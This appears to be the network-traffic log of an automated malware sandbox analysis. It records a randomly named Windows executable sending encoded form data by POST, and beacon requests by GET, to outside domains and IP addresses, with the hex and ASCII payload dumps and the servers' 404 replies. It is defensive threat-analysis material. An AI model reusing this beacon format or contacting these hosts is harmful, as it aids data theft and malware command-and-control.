                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 56 50 32 7a 47 4f 41 36 71 70 6d 51 38 6e 65 39 64 2f 57 79 56 76 46 6d 48 4a 74 78 75 31 61 47 48 32 57 2b 75 75 56 78 6b 43 64 54 71 66 69 4c 47 38 75 61 74 6c 54 62 7a 73 30 61 6c 56 73 61 59 36 63 52 6a 48 4d 62 4e 71 69 6a 72 4e 54 5a 68 75 72 47 36 6b 76 55 48 50 6f 75 68 42 35 4c 70 78 7a 59 46 2b 69 69 33 4f 39 52 79 72 43 6b 4c 4f 31 56 77 74 6a 48 75 79 66 78 62 48 2b 62 49 54 2b 48 6c 68 6c 64 56 58 2f 34 62 51 73 47 6a 4c 31 6a 64 57 2b 66 59 75 51 68 70 36 48 64 76 56 77 37 48 4c 68 57 61 47 45 77 30 30 63 6a 33 30 65 38 74 33 52 33 35 7a 68 64 74 57 75 35 61 6e 32 49 53 67 4c 44 42 79 46 75 34 52 47 76 42 39 77 44 6e 6a 6a 65 78 4b 76 7a 53 52 54 61 4f 69 33 73 76 7a 71 52 46 32 53 65 34 59 73 65 58 6a 51 6d 52 4d 4f 4f 62 65 52 5a 2f 39 59 6b 52 36 30 6d 77 56 2f 41 41 52 36 44 77 64 76 73 35 74 78 59 63 33 5a 70 47 32 78 4e 53 53 75 4b 5a 74 6a 36 53 4d 4a 43 67 68 49 6d 62 72 2b 7a 44 58 55 6d 79 48 6e 2b 51 36 38 4e 41 54 39 43 50 31 36 30 4e 38 36 75 6f [TRUNCATED]
                                                                                  Data Ascii: AvLLLbOh=VP2zGOA6qpmQ8ne9d/WyVvFmHJtxu1aGH2W+uuVxkCdTqfiLG8uatlTbzs0alVsaY6cRjHMbNqijrNTZhurG6kvUHPouhB5LpxzYF+ii3O9RyrCkLO1VwtjHuyfxbH+bIT+HlhldVX/4bQsGjL1jdW+fYuQhp6HdvVw7HLhWaGEw00cj30e8t3R35zhdtWu5an2ISgLDByFu4RGvB9wDnjjexKvzSRTaOi3svzqRF2Se4YseXjQmRMOObeRZ/9YkR60mwV/AAR6Dwdvs5txYc3ZpG2xNSSuKZtj6SMJCghImbr+zDXUmyHn+Q68NAT9CP160N86uoQFoMWKF3hHkJaiQbpF0uxnFZaAeKUDnnfPf1MEL5XhGNLpa2ZkiYAdwMxI2fLLYDgMnIBxtYsQQNdAzqcLlPMYD7MFKSHnI9tHKOBe0/zXYjdJpFYfymZqB+5URMCYdzMUmtH68znWWBfyJ1ofVYG9Jj39BFyQLxJDU3gSi9HhM+fHEp1P/lNvN4uC4KpI1f7GCdIK5JBz629k=
                                                                                  Aug 27, 2024 17:48:48.385226011 CEST1033INHTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  content-type: text/html
                                                                                  content-length: 796
                                                                                  date: Tue, 27 Aug 2024 15:48:48 GMT
                                                                                  server: LiteSpeed
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  32192.168.11.2049838172.96.191.39805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:48:50.929811954 CEST2578OUTPOST /frol/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.bola88site.one
                                                                                  Origin: http://www.bola88site.one
                                                                                  Referer: http://www.bola88site.one/frol/
                                                                                  Content-Length: 52933
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 56 50 32 7a 47 4f 41 36 71 70 6d 51 38 6e 65 39 64 2f 57 79 56 76 46 6d 48 4a 74 78 75 31 61 47 48 32 57 2b 75 75 56 78 6b 43 46 54 71 4d 71 4c 41 62 36 61 73 6c 54 62 37 4d 30 62 6c 56 73 4c 59 36 45 64 6a 48 77 55 4e 76 6d 6a 6f 65 72 5a 68 38 7a 47 78 45 76 5a 49 76 6f 57 33 42 35 66 70 78 2b 52 46 2b 6d 49 33 65 68 52 7a 70 61 6b 63 4a 42 61 79 39 6a 4e 75 79 66 39 51 6e 2b 54 49 54 71 58 6c 68 68 64 56 55 4c 34 59 44 45 47 6c 63 70 6a 55 6d 2b 63 43 65 51 75 2b 71 47 6c 76 56 30 76 48 4c 68 73 61 45 6f 77 30 30 38 6a 35 54 4b 39 74 58 52 33 6e 6a 68 65 70 57 71 39 61 6e 72 62 53 67 58 44 42 31 35 75 34 78 47 76 45 5a 45 41 75 6a 6a 59 6d 61 75 71 57 52 58 43 4f 6b 61 64 76 79 65 52 46 47 57 65 35 72 45 65 52 43 51 6d 63 4d 4f 41 45 4f 51 44 30 64 5a 6e 52 36 6b 63 77 56 66 2b 41 57 4b 44 68 4d 50 73 37 49 4e 5a 63 58 5a 76 44 32 78 69 45 53 69 57 5a 74 7a 6d 53 4d 49 50 67 67 4d 6d 59 62 4f 7a 43 53 67 68 31 58 6e 35 57 36 38 69 4c 7a 42 79 50 31 4f 73 4e 39 79 2b 6f [TRUNCATED]
                                                                                  Data Ascii: AvLLLbOh=VP2zGOA6qpmQ8ne9d/WyVvFmHJtxu1aGH2W+uuVxkCFTqMqLAb6aslTb7M0blVsLY6EdjHwUNvmjoerZh8zGxEvZIvoW3B5fpx+RF+mI3ehRzpakcJBay9jNuyf9Qn+TITqXlhhdVUL4YDEGlcpjUm+cCeQu+qGlvV0vHLhsaEow008j5TK9tXR3njhepWq9anrbSgXDB15u4xGvEZEAujjYmauqWRXCOkadvyeRFGWe5rEeRCQmcMOAEOQD0dZnR6kcwVf+AWKDhMPs7INZcXZvD2xiESiWZtzmSMIPggMmYbOzCSgh1Xn5W68iLzByP1OsN9y+oQxoM2KF8mbnS6iTEZFq2RnWZaFNKVHdnujfzsULu3hHGLoT95kkPQdwMxEMfL3YDVgnJ21tIPIQLdA1qcL0PMUO7M9VSHXu9urKOVC08yXbmtJsS4fh7Jus+5YJMDpqmvQmsHq83nWRLfyK2ofDJWxNj3RwFyNQxLzUn3fKp1wT8vHfmlSAmrni+vXNF5oreO2wCoeDURTavLH7yfy0XE9oxrgp8x81W2LWTcAmUaAk/OzRnTsLtEi2AAuDXWs28BHkwqJy8Mm9GRJPxjk/zJc8rqhbGzgikixqz7nRRpdeVkM5Hk8DTVXUBopd8N+cgjIOhzQc2O8OptycYetXxl1FRKt2og9NxwlRPsp7LBLBhGfy7N+0YJNdYjXYDSXojIwMvAwCwpVRd4U49SuCE/3wRWWDmZ8VZ29+chq5XSphHy29CDn08n5UnGuSPCdI/zvxBzx+0fa9GOta/lpGf6maApCHEJuxPPgpBqmEt7UYNiO9ptmQYkD1ViDu6z2sOzewfgLUiyfbIDqFJUSS8ipZ7iVnfDFKEPf0ZtfGdnqEDZ6DSPcE8oHWODltCSH56ObJ8K1u2Z1Pz5F9qX5ao236uzv4VCPjYwI4mRUk5IUvyFSCZ8QgxHaUkL5opK6IX8lN763lQ0TJ4CUHi2M9jQtW6wi7d9crJoL [TRUNCATED]
                                                                                  Aug 27, 2024 17:48:50.929861069 CEST6445OUTData Raw: 45 31 62 64 79 78 6a 52 67 36 6a 68 5a 43 6d 65 74 50 71 65 78 35 52 6f 30 50 2b 73 63 67 55 77 48 4a 2f 37 4d 56 47 76 68 71 4c 79 6a 62 54 73 58 52 2f 4d 69 31 6f 4f 35 2b 55 69 52 6b 4b 45 4a 74 76 4d 63 59 42 34 4b 2f 46 54 71 6f 64 79 38 4c
                                                                                  Data Ascii: E1bdyxjRg6jhZCmetPqex5Ro0P+scgUwHJ/7MVGvhqLyjbTsXR/Mi1oO5+UiRkKEJtvMcYB4K/FTqody8LMIpmbGoVWLlT4F7mCQ8Qwkh294ASNZQ/PLSeSD9EYckeYtr5A3ClWeQCPgAba7wfVhtn50bAcqQ7hZVw0hShcIBJ7pA6pW6CyiIL0VAwbgARP97oaJRfQRkK5VGXEWuK/gupKTsG6HLpDyz7GlSezQ/ucCDKTIujr
                                                                                  Aug 27, 2024 17:48:50.929925919 CEST3867OUTData Raw: 64 79 41 2f 62 41 48 2f 47 6b 6a 43 66 47 45 67 41 49 44 6c 68 76 71 42 31 49 36 36 52 4d 78 75 6a 50 48 6e 42 77 4a 78 72 53 5a 56 56 67 34 46 52 69 65 48 6b 59 73 61 2b 49 65 75 50 59 62 63 65 47 50 44 72 43 72 5a 37 4d 45 56 39 7a 47 70 58 6d
                                                                                  Data Ascii: dyA/bAH/GkjCfGEgAIDlhvqB1I66RMxujPHnBwJxrSZVVg4FRieHkYsa+IeuPYbceGPDrCrZ7MEV9zGpXmCAA9CvNGZOwmh2WFE/bnfz1mzLWzH7774cpA5xFypwMa3IMU470y7N34xJEx3WTh/E8//f3TRGL8tjwyJ3zXIjL6AozxUwFYQ/ihBCM2XQsIHShEQMOwMh5buC6VxXlv0+Uxw9SelA0/bb1SgcZs10211M9GIrcWN
                                                                                  Aug 27, 2024 17:48:51.261825085 CEST2578OUTData Raw: 58 4a 72 61 32 4b 36 79 54 62 79 33 79 78 63 62 63 34 50 64 59 34 6d 44 6d 6a 2b 6c 42 46 50 71 53 51 43 48 46 70 31 38 66 73 6a 70 61 70 55 45 55 70 42 4b 2b 6f 62 49 56 56 45 30 52 6d 77 36 4f 59 64 56 74 58 72 43 4b 4b 66 34 77 2b 77 37 32 2f
                                                                                  Data Ascii: XJra2K6yTby3yxcbc4PdY4mDmj+lBFPqSQCHFp18fsjpapUEUpBK+obIVVE0Rmw6OYdVtXrCKKf4w+w72/eskuXNn7iKcwECVu14NP4aE77oMBJ9/g30Puz8Qb1ZfjKzho0OJHbDB80aPg9MWXNY9GnDdQm+N+ytHsr+BdZ1O1+Ju1rb8/qu3yLkY0jLv9Ep2h8hM3SqwGaMPYf7zkUEzeBlfI1KIhCdlLQQc9nW8KLu+Iwk8cr
                                                                                  Aug 27, 2024 17:48:51.261888981 CEST1033INHTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  content-type: text/html
                                                                                  content-length: 796
                                                                                  date: Tue, 27 Aug 2024 15:48:51 GMT
                                                                                  server: LiteSpeed
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
                                                                                  Aug 27, 2024 17:48:51.261898041 CEST10312OUTData Raw: 64 75 71 33 38 45 58 4b 46 71 63 67 50 65 4f 2f 78 4e 55 52 68 46 32 4e 35 7a 51 72 68 70 37 76 69 52 54 7a 58 2f 52 32 64 4a 71 46 39 43 6a 78 69 6b 49 74 67 46 4d 4e 4c 42 31 73 4c 49 44 49 57 61 4d 75 62 46 79 47 68 6f 56 2b 75 42 61 32 6b 61
                                                                                  Data Ascii: duq38EXKFqcgPeO/xNURhF2N5zQrhp7viRTzX/R2dJqF9CjxikItgFMNLB1sLIDIWaMubFyGhoV+uBa2kaOBzsuqwQZM5nsEBolZiswPa0sNA18CSJqziXowh1rVfjPQNdpSctOGGsnVn0ru+cAehSGP11tHwUDE8qE0rJpbi2Az6k1tMM7lgd12XKBkEvosaKlSb/ewYg1jM7IXd2w07ZSxM3fVa1gBHiMxyJUY+ydOSdrjotU
                                                                                  Aug 27, 2024 17:48:51.261953115 CEST2578OUTData Raw: 54 50 42 6b 64 64 43 76 74 58 56 49 65 4e 54 43 41 43 59 61 6d 50 72 34 32 7a 51 69 74 53 7a 70 79 4b 74 6c 4f 4c 49 74 77 47 78 2b 44 56 64 53 2f 4f 30 78 68 42 67 46 47 57 44 47 56 42 5a 43 6c 37 33 52 43 43 4f 37 31 6a 6f 52 56 75 42 4b 33 4c
                                                                                  Data Ascii: TPBkddCvtXVIeNTCACYamPr42zQitSzpyKtlOLItwGx+DVdS/O0xhBgFGWDGVBZCl73RCCO71joRVuBK3LrQFajbLplLArRFBPpqB12JfaMOoprV7Jd5/V3G8x5sc5E5c5mWYfzlyHBAScme5BdhxGzLNbsyWGXcyxwwoZdPlPQp0EBu0qDPFxKwq+kr4HPzWwjXVuuCgtz5moSDWtnk9EBy3WoF4IvjrVvgqwBha0TNPOQoPoa


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  33192.168.11.2049839172.96.191.39805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:48:53.795021057 CEST527OUTGET /frol/?AvLLLbOh=YNeTF4pSv4+M6gG3KqO7busQPotc22z/OB6yhtk01jUCobC9Y52Gmw3Z99Ir4kEoVNEa+n0iDPzrnsm9kM3Fz3qyLYlg0011pg2PCcWBraIo86SjG5d0+YE=&7RB=66nPyLG8 HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Host: www.bola88site.one
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Aug 27, 2024 17:48:54.125811100 CEST1033INHTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  content-type: text/html
                                                                                  content-length: 796
                                                                                  date: Tue, 27 Aug 2024 15:48:53 GMT
                                                                                  server: LiteSpeed
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  34192.168.11.2049840148.135.49.178805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:49:00.533078909 CEST812OUTPOST /w4ze/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.policydetails.online
                                                                                  Origin: http://www.policydetails.online
                                                                                  Referer: http://www.policydetails.online/w4ze/
                                                                                  Content-Length: 205
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 51 32 68 4e 72 48 66 32 33 65 4c 33 62 69 4e 41 59 48 65 33 48 71 66 76 58 62 37 71 2b 38 30 74 6f 6e 76 6a 63 32 59 51 35 59 71 49 41 30 35 73 72 53 42 6c 75 59 63 38 71 2f 74 38 47 30 6a 31 43 44 2f 36 30 6a 72 75 39 6b 73 41 74 2f 65 58 6b 6a 70 49 57 49 6a 65 6e 7a 2b 65 43 46 35 64 30 57 67 68 4d 41 32 2f 37 46 6f 76 39 55 4c 47 78 53 31 33 32 31 6e 4a 74 48 35 55 71 79 44 59 6c 6b 31 49 61 64 41 4a 62 34 63 2f 46 36 71 4b 6b 46 4c 45 7a 39 58 51 46 65 67 52 6a 44 70 49 43 6d 4a 76 68 6b 4f 72 4c 48 39 70 4c 41 57 73 45 54 4c 73 54 49 30 61 63 45 5a 61 31 6e 66 36 6c 77 3d 3d
                                                                                  Data Ascii: AvLLLbOh=Q2hNrHf23eL3biNAYHe3HqfvXb7q+80tonvjc2YQ5YqIA05srSBluYc8q/t8G0j1CD/60jru9ksAt/eXkjpIWIjenz+eCF5d0WghMA2/7Fov9ULGxS1321nJtH5UqyDYlk1IadAJb4c/F6qKkFLEz9XQFegRjDpICmJvhkOrLH9pLAWsETLsTI0acEZa1nf6lw==
                                                                                  Aug 27, 2024 17:49:01.170279980 CEST1289INHTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  x-powered-by: PHP/8.1.29
                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                                                  content-type: text/html; charset=UTF-8
                                                                                  link: <https://policydetails.online/wp-json/>; rel="https://api.w.org/"
                                                                                  transfer-encoding: chunked
                                                                                  content-encoding: gzip
                                                                                  vary: Accept-Encoding
                                                                                  date: Tue, 27 Aug 2024 15:49:01 GMT
                                                                                  server: LiteSpeed
                                                                                  Data Raw: 65 39 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 5b fb 73 9b 48 12 fe 79 5d 75 ff 03 26 b5 36 6c 00 01 7a 4b 26 a9 6c 92 bd da ab bd cb d6 26 a9 fb 21 4e a5 10 0c 12 09 02 96 87 6d 9d a2 ff fd be 19 9e c2 e8 61 29 a9 58 11 43 77 7f 3d 3d 3d fd 98 71 6e 2e ed c0 4a 56 21 e1 16 c9 d2 e3 5e fc e3 e2 e6 52 96 3f b9 0e f7 fb 5b 6e f4 f9 05 87 3f 37 ec 95 e5 99 71 6c f0 2e 19 f1 9c 67 fa 73 83 27 3e ff 82 bb b9 fc 44 7c db 75 3e cb f2 36 f3 b8 95 79 7c 04 f3 3c c9 c1 a9 2a 40 60 f0 05 a4 fc f1 3d 43 95 e5 06 f2 82 98 36 34 60 0a 2f 49 62 72 d6 c2 8c 62 92 18 fc c7 0f bf c9 50 ba b3 f5 d6 37 97 c4 e0 ef 5c 72 1f 06 51 c2 73 56 e0 27 c4 07 f5 bd 6b 27 0b c3 26 77 ae 45 64 f6 20 71 ae ef 26 ae e9 c9 b1 65 7a c4 d0 14 95 2f 64 79 ae ff 8d 8b 88 67 f0 a1 eb cf 67 a6 f5 8d e7 16 11 71 0c 7e 91 24 e1 a4 d3 09 03 cf b5 56 36 14 72 bd 58 09 7c 30 90 ce c3 d2 8b 42 4b 09 17 61 4d ad c4 4d 3c f2 e2 4f 73 4e 38 3f 48 38 27 48 7d 9b bb 7a 36 d2 35 6d ca fd ee c7 69 64 fa 16 e1 fe 64 02 b9 37 99 c4 9b 4e c6 76 71 53 6a [TRUNCATED]
                                                                                  Data Ascii: e93[sHy]u&6lzK&l&!Nma)XCw===qn.JV!^R?[n?7ql.gs'>D|u>6y|<*@`=C64`/IbrbP7\rQsV'k'&wEd q&ez/dyggq~$V6rX|0BKaMM<OsN8?H8'H}z65midd7NvqSjrmBXLvEa0|BWF_"~O/{{}HW=IL=n|<~On;XWh~q[|vmG+~%_9i@|4?YXqLL[^j|'t}kD@(LaK949IhI}+q_p%_\HD8gD\'Kug?8'DJ%p"{rgz)yf8IHz?JDX=Y(n`kA6>AU#F+TIlp%%E"=f}zUqJ'TtWQdun#ZA(JuNFF$I#K'Xu}J>oiaOQTWUswr[%t+`AH%"
                                                                                  Aug 27, 2024 17:49:01.170337915 CEST1289INData Raw: 1c a7 07 8a 59 4f c5 a7 35 80 4e e5 77 bd f6 bd 5f fb 4e 6a df 6b f4 43 a7 0e cf c4 e6 f0 35 e1 8d 11 40 34 46 00 d4 18 01 5c 63 04 a0 db 23 80 16 a7 6c 09 f2 e8 90 ad 41 6d a6 b0 b8 6d e9 03 c6 48 ad 3f d3 66 85 b6 f5 57 d4 e2 f4 95 b8 c9 25 68
                                                                                  Data Ascii: YO5Nw_NjkC5@4F\c#lAmmH?fW%h;M<=ql8p7fBruA:~G.h#yI |fTUq*Fx%g;%6|M 6,y[M.(`*W)hAKu{!mBA
                                                                                  Aug 27, 2024 17:49:01.170388937 CEST1289INData Raw: bd 09 d7 ed f4 0e 10 e9 94 48 df 4b a4 53 38 fd 00 9c 36 90 c7 d0 7b d0 19 ef 95 35 96 b5 c1 84 1b 77 b4 41 83 8c d9 5e 86 7b 61 cf 4e b8 67 2a fb d3 4e 63 ad 4c 1f 84 a9 1b 2f e4 39 da 6d 90 9b b3 d9 c8 6a da 23 17 79 bf 70 13 98 94 fa 27 75 d1
                                                                                  Data Ascii: HKS86{5wA^{aNg*NcL/9mj#yp'um4!NdwQhg8a;{8 A@yf9:I;NX<a0VxLZRunz,/U@>)EV[5}nT5'N]cM2M4=*x<ki,"7K2deFu6K/
                                                                                  Aug 27, 2024 17:49:01.170465946 CEST279INData Raw: 39 21 66 9d 80 f2 f4 58 75 02 c8 53 63 d4 c9 10 3b 63 53 43 83 ea 98 3a 2f fe ca f3 fd 2a 3e d6 ea a9 b6 e8 52 72 1c ba 8c 68 f3 fb 86 0b 55 ea 54 29 aa bc bb a8 55 15 47 ab 74 cc 25 45 9b 5e 4f b9 5d 38 4f c1 a7 20 1d d6 b4 e5 f2 e1 47 aa d7 22
                                                                                  Data Ascii: 9!fXuSc;cSC:/*>RrhUT)UGt%E^O]8O G"E#$R-Z^UGg>jx2$ `l-78"}CcDvp@"/8Ab-avqy4oc`?\XS
                                                                                  Aug 27, 2024 17:49:01.177611113 CEST1289INData Raw: 61 62 39 0d 0a cc 5c fb 73 db 36 12 fe 39 99 b9 ff 01 61 67 22 fb 5a 8a 92 e3 c4 4e 22 39 d3 ba 49 27 37 79 78 ea dc b5 37 cd 0d 87 12 29 99 ae 24 aa 7c f8 31 bd fc ef f7 ed 02 20 41 12 7a d9 9d 5e f5 83 2d 42 78 2c 76 17 8b 05 b8 df ae 89 0a cb
                                                                                  Data Ascii: ab9\s69ag"ZN"9I'7yx7)$|1 Az^-Bx,vCw9+"5I;D!0[#]1armL$a<v;J2;U$q,JZ&O{&G{NLQm[7y2BX?;I)^^dfH"d+(
                                                                                  Aug 27, 2024 17:49:01.177710056 CEST1289INData Raw: e0 b8 c8 f2 64 2e 70 ec 83 c7 5c fa db 54 1f 9e ee f7 f1 95 38 55 67 74 02 15 92 ea 54 80 b7 87 0f 2a 68 21 bc f5 6b 3a 9a e2 46 23 18 47 17 c9 0c de ba 73 b2 6b ff 1a 4b 37 f0 54 3e 1b 24 e4 e1 d8 42 95 7e 27 4a d3 24 3d ec 1d 62 95 00 44 05 87
